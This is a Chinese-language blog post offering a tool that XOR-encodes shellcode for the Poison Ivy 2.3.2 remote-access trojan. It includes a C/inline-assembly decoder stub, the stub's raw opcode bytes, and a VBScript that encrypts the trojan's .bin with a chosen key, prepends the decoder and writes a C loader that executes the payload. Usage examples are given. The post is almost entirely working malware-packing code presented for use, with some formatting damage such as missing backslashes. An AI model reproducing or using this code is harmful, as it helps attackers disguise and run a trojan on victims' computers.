xor shellcode for Poison Ivy 2.3.2 bin
From vbs小铺blog
=======================================================================================================================
用c代码和汇编得到一个xor &h21 的解码头的示例代码
#include <string.h>
#include <stdio.h>int main()
{
__asm
{
jmp decode_end //为了获得enShellCode的地址
decode_start:
pop edx // 得到enShellCode的开始位置 esp -> edx
dec edx
xor ecx,ecx
mov cx,0x2134 //要解码的 enShellCode长度,0x2134=8500字节应该足够pi的shellcode长度
decode_loop:
xor byte ptr [edx+ecx], 0x21 //因为编码时用的Key是0x21,所以解码要一样
loop decode_loop //循环解码
jmp decode_ok //解码完毕后,跳到解码后的地方执行!
decode_end:
call decode_start
decode_ok: //后面接编码后的enShellCode
}
return 0;
}
od反汇编得到decode的解码头为:"xEBx10x5Ax4Ax33xC9x66xB9x34x21x80x34x0Ax21xE2xFAxEBx05xE8xEBxFFxFFxFF"
==============================================================================================================================
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end ifif Wscript.Arguments.count=0 Then
usage()
wscript.quit
End If
10进制转16进制函数
Function Dec2Hex(Dec)
Dec2Hex = ""
Do While Dec > 0
a = CStr(Dec Mod 16)
Select Case a
Case "10": a = "A"
Case "11": a = "B"
Case "12": a = "C"
Case "13": a = "D"
Case "14": a = "E"
Case "15": a = "F"
End Select
Dec2Hex = a & Dec2Hex
Dec = Dec 16
Loop
End Function读取二进制文件函数
Function ReadGif(sStr)
Dim i, iHex, sPath, oStream
Set oStream = CreateObject("Adodb.Stream")
oStream.Type = 1
oStream.Open
oStream.LoadFromFile sStrFor i = 1 To LenB(oStream.Read())
oStream.Position = 0
iHex = Hex(AscB(MidB(oStream.Read(), i, 1)))
If Len(iHex) = 1 Then iHex = "0" & iHex
ReadGif = ReadGif & iHex
NextoStream.Close
Set oStream = Nothing
End Function把代码分块输出函数
Function CutAndJoin(sSource, iLong, sJoiner)Dim I, N
N = Len(sSource) / iLong
If(N <> Fix(N))Then N = Fix(N) + 1For I = 0 To N - 1
CutAndJoin = CutAndJoin & Mid(sSource, I * iLong + 1, iLong) & sJoiner
NextIf(N > 0)Then CutAndJoin = Left(CutAndJoin, Len(CutAndJoin) - Len(sJoiner))
End Function
Set Arg=Wscript.Argumentstempshellccode=CutAndJoin(ReadGif(arg(0)),2,"x")
shellcode=Split(tempshellccode,"x")
For i=1 To UBound(shellcode)
temp=(("&h"&shellcode(i)) Xor "&h"&arg(1))
temp=Dec2Hex(CStr(temp))
If Len(temp)=1 Then temp="0"&temp
If temp="" Then temp="00"
vbshellcode=vbshellcode&"x"&temp
Nextdecode="xEBx10x5Ax4Ax33xC9x66xB9x34x21x80x34x0Ax"&arg(1)&"xE2xFAxEBx05xE8xEBxFFxFFxFF"
decode=decode&LCase(vbshellcode)WScript.Echo CutAndJoin(decode, 80, Chr(13)) 80正好是4的倍数,这样排列好看一些
Function writef(cpp)
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(cpp,2,true)
.writeline "#include<windows.h>"
.writeline "char ShellCode[]="
.writeline Chr(34)&CutAndJoin(decode, 80, Chr(34)&Chr(13)&Chr(34))&Chr(34)&";"
.writeline "int main()"
.writeline "{"
.writeline " ( (void(*)(void)) &ShellCode)();"
.writeline "return 0;"
.writeline "}"
.close
End with
Set fso = Nothing
End Functionwritef(arg(2))
Function Findfile(str)
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(str) Then
findfile=true
Else
findfile=false
End If
End Function
If Findfile(arg(2))=True then
wsh.echo "已生成"&arg(2)&"的c语言格式文件"
End if
function usage()
wscript.echo "+--codz By lcx ^^ shellcode xor for Poison Ivy 2.3.2 vbscript-------+"
wscript.echo "|不只是针对Poison的bin文件进行变形,稍做改动可以xor其它的shellcode---+"
wscript.echo "|Useage: |"
wscript.echo "| cscript.exe shellcode.vbs x.bin xorhexnum test.cpp |"
wscript.echo "|ex: |"
wscript.echo "| cscript.exe shellcode.vbs c:PoisonIvy.bin 21 c: est.c
补充:综合编程 , 安全编程 ,